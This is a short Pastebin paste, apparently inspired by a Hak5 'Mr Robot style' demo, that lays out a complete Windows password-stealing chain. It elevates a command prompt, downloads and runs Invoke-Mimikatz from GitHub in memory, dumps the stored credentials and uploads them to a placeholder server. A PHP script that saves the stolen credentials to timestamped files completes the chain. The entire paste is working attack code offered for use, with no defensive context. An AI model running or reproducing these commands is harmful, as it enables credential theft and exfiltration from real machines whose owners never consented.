metalx1000

Dump Windows Passwords

Sep 12th, 2016
689
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #based on notes from https://www.hak5.org/blog/15-second-password-hack-mr-robot-style
  2. #Start CMD as Admin
  3. powershell Start-Process cmd -Verb runAs
  4.  
  5. #get "Invoke Minikatz
  6. powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1');
  7.  
  8. #Dump to var
  9. $output = Invoke-Mimikatz -DumpCreds;
  10.  
  11. #upload output
  12. (New-Object Net.WebClient).UploadString('http://<server>/rx.php', $output)"
  13.  
  14. #simple PHP dump to file with timestamp
  15. <?php
  16. $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
  17. file_put_contents($file, file_get_contents("php://input"));
  18. ?>
Add Comment
Please, Sign In to add comment